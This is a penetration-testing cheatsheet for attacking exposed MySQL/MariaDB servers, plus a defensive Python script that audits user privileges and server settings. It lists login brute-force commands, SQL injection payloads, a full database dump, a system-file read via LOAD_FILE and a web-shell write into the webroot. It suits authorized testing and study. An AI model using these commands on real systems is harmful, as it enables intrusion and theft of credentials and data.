0) What is MySQL / MariaDB?
MySQL and MariaDB are widely used relational database servers that typically listen on TCP port 3306. They store application data, credentials, configuration, and sometimes secrets. In assessments and red-team competitions, an exposed database server (remote access to port 3306) is high-value: weak credentials, misconfigurations, or excessive privileges (e.g., FILE) let you dump data, read server files, or write web shells.
1) Recon Phase
- Service discovery: nmap -sV -p 3306 <target>
- Banner grab & version: nmap -sV -p 3306 --script=mysql-info <target>
- Check reachability from your network: telnet <target> 3306 or nc -vz <target> 3306
- Identify hosts running MySQL vs MariaDB via banner and fingerprinting
Note version strings (important for known CVEs) and whether the server accepts remote connections. Record any hostnames or service names returned in banners.
2) Enumeration Phase
- Attempt anonymous/null auth (rare): mysql -h <target> -u '' -e "SHOW DATABASES;"
- Test common creds / defaults: mysql -h <target> -u root -p (try default/root passwords)
- Use targeted scanners:
nmap --script=mysql-brute,mysql-info -p 3306 <target>
msfconsole: auxiliary/scanner/mysql/mysql_login
- Enumerate users & privileges (when authenticated):
SELECT User, Host FROM mysql.user;
SHOW GRANTS FOR 'user'@'host';
- Check for users with FILE or SUPER privilege (FILE allows server-side file read/write):
SELECT * FROM mysql.user WHERE File_priv='Y' OR Super_priv='Y';
- Discover databases/tables when authenticated:
SHOW DATABASES;
USE <database>; SHOW TABLES;
SELECT COUNT(*) FROM <table> LIMIT 1;
Prioritize finding credentials, users with elevated privileges, and evidence of stored secrets (config tables, api_keys, password reset tokens).
SQL Injection
In-Band SQL Ex: 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '\n') FROM staff_users
Blind SQL - Authentication Bypass Ex: ' OR 1=1;--
Blind SQL - Boolean Based Ex: admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
MySQL / MariaDB Info — What to Look For
- Default or weak credentials (root/root, root with no password)
- Accounts with excessive privileges (FILE, SUPER, PROCESS)
- Plaintext credentials stored in config tables or application DB
- secure_file_priv unset or set to a writable directory
- Remote access allowed from internet (bind-address 0.0.0.0)
- Old versions with known exploits or misconfigurations
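Added example (not from the original cheatsheet): a small Python audit that applies the checklist above to rows exported from mysql.user plus the two server settings. The sample rows, hashes, secure_file_priv and bind_address values are constructed, and the column order is assumed to match the SELECT named in the docstring.

```python
"""Audit mysql.user rows and server settings for the weaknesses in the checklist above.

Added example, not part of the original cheatsheet. The rows mimic the output of
SELECT User, Host, File_priv, Super_priv, plugin, authentication_string FROM mysql.user;
and the two settings mimic @@global.secure_file_priv and @@global.bind_address.
All sample values below are constructed.
"""
from typing import List, Optional, Tuple

# User, Host, File_priv, Super_priv, plugin, authentication_string
UserRow = Tuple[str, str, str, str, str, str]

# Socket-based plugins authenticate via the OS user, so an empty hash is not a missing password.
SOCKET_PLUGINS = {"auth_socket", "unix_socket"}

# Constructed sample rows (hashes are placeholders, not real credentials)
SAMPLE_USERS: List[UserRow] = [
    ("root", "localhost", "Y", "Y", "mysql_native_password", "*PLACEHOLDERHASH"),
    ("root", "%", "Y", "Y", "mysql_native_password", ""),            # remote root, no password
    ("app", "10.0.0.%", "N", "N", "caching_sha2_password", "$A$005$PLACEHOLDER"),
    ("report", "%", "Y", "N", "mysql_native_password", "*PLACEHOLDERHASH2"),
    ("debian-sys-maint", "localhost", "N", "N", "unix_socket", ""),  # socket auth, not passwordless
]
SAMPLE_SECURE_FILE_PRIV: Optional[str] = ""  # "" = unrestricted, None = NULL (disabled), path = limited to that dir
SAMPLE_BIND_ADDRESS = "0.0.0.0"


def audit_mysql(rows: List[UserRow], secure_file_priv: Optional[str], bind_address: str) -> List[str]:
    """Return one finding string per weakness found; an empty list means nothing was flagged."""
    findings: List[str] = []
    for user, host, file_priv, super_priv, plugin, auth in rows:
        who = f"'{user}'@'{host}'"
        if auth == "" and plugin not in SOCKET_PLUGINS:
            findings.append(f"{who}: empty password")
        if host == "%":
            findings.append(f"{who}: login allowed from any host")
        if file_priv == "Y":
            findings.append(f"{who}: FILE privilege (server-side file read/write)")
        if super_priv == "Y" and user != "root":
            findings.append(f"{who}: SUPER privilege on non-root account")
    if secure_file_priv == "":
        findings.append("secure_file_priv is empty: LOAD_FILE / INTO OUTFILE unrestricted")
    elif secure_file_priv is not None:
        findings.append(f"secure_file_priv limits file I/O to {secure_file_priv}; check it is not web-writable")
    if bind_address in ("0.0.0.0", "::", "*"):
        findings.append(f"bind-address {bind_address}: server listens on all interfaces")
    return findings


if __name__ == "__main__":
    for line in audit_mysql(SAMPLE_USERS, SAMPLE_SECURE_FILE_PRIV, SAMPLE_BIND_ADDRESS):
        print(line)
```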
Tools Required
sudo apt install nmap mysql-client mariadb-client mysql-server
# pentest tools
sudo apt install hydra sqlmap metasploit-framework
# utilities
mysqldump, mysqlshow, mysqladmin (included in the client packages above)
Quick copy-paste command cheatsheet
# discovery & banner
nmap -sV -p 3306 --script=mysql-info,mysql-config <target>
# test connectivity
nc -vz <target> 3306
telnet <target> 3306
# try login (interactive)
mysql -h <target> -u root -p
# automated brute (authorized only)
nmap --script mysql-brute -p 3306 --script-args userdb=users.txt,passdb=pass.txt <target>
msfconsole -q -x "use auxiliary/scanner/mysql/mysql_login; set RHOSTS <target>; set USERNAME root; set PASSWORD 1234; run; exit"
# once authenticated: list databases/tables
SHOW DATABASES;
USE <database>; SHOW TABLES;
# dump databases (authenticated)
mysqldump -h <target> -u user -p'password' --databases <database> > db.sql
# check FILE privileges / secure_file_priv
SELECT User, Host, File_priv, Super_priv FROM mysql.user;
SELECT @@global.secure_file_priv;
# attempt to read file (if allowed)
SELECT LOAD_FILE('/etc/passwd');
# write webshell (if permitted by secure_file_priv and webroot path)
SELECT '' INTO OUTFILE '/var/www/html/shell.php';
Citations
- MySQL Reference Manual
- MariaDB Knowledge Base
- Nmap NSE — mysql-info / mysql-brute
- sqlmap — automated SQL injection (useful when DB accessible via web app)
Disclaimer: Use these techniques only on systems you own, in contained labs, or where you have explicit authorization (CTF / engagement rules). Actions such as writing files, UDF upload, or changing database state can be disruptive—treat them as last-resort, score-hungry moves and follow the rules of engagement.